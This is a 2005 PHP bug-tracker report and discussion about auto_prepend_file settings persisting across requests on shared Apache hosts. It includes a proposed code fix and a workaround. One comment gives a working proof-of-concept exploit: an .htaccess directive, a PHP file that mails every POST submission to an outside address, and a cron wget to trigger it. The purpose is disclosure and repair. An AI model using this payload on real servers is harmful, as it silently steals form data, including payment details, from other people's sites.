ID: 31844
Updated by: [EMAIL PROTECTED]
Reported By: phpbugrep-20050204 at pgregg dot com
-Status: Open
+Status: Feedback
Bug Type: *Web Server problem
Operating System: All
PHP Version: Irrelevant
New Comment:
So have you actually verified that this happens with Apache1+PHP4.x?
I'll test other versions as well, but I just tested that combination
and auto_prepend_file is getting reset correctly there. If it only
happens on certain server versions or certain PHP versions, please
provide those versions so we have a chance to verify this.
Previous Comments:
------------------------------------------------------------------------
[2005-02-04 19:02:41] kevinphpdotnet at stormtide dot ca
Working example exploit. Because the auto-prepend is not reset we can
add exploit.php to other scripts (even ones we dont own) provided that
we are the first request to a child thread.
-------- .htaccess --------
php_value auto_prepend_file exploit.php
-------- exploit.php --------
<?php
if($_SERVER['REQUEST_METHOD'] == "POST") {
mail("[EMAIL PROTECTED]", "Values", var_export($_POST));
}
?>
-------- legit.php -----------
<?PHP
echo "a";
?>
---- cron entry elsewhere ----
wget http://www.mywebhotel.com/legit.php
set every minute
------------------------------------------------------------------------
[2005-02-04 13:03:39] phpbugrep-20050204 at pgregg dot com
Description:
------------
SECURITY ALERT:
Related to: http://bugs.php.net/bug.php?id=28729
http://bugs.php.net/bug.php?id=27110
(First the rant) This isn't the same bug... and to be honest I'm
getting quite pissed at the amount of times a bug is reported only to
be closed as Bogus because dev can't be arsed to look into it. This
just results in people not bothering to report bugs.
In this case, the auto_prepend_file and auto_append_file values are not
reset between requests. Thus one change in a .htaccess file results in
the change lingering on for the next request (perhaps even on a
different vhost).
This could be a very nasty security issue because it lets me, in a web
hotel, insert code into other people websites, such as emailing me
$GLOBALS so I could extract credit card details, etc.
I believe the fix is in main/main.c (in 5.0.3) in php_module_startup()
to add:
PG(auto_prepend_file) = NULL;
PG(auto_append_file) = NULL;
The same will be the case in the 4.x tree.
The same should be true for other "leaking" values.
As a workaround setting the Apache MaxRequests to 1 will result in a
fresh apache and as a result a fresh php. The hit is poor performance.
------------------------------------------------------------------------
--
Edit this bug report at http://bugs.php.net/?id=31844&edit=1
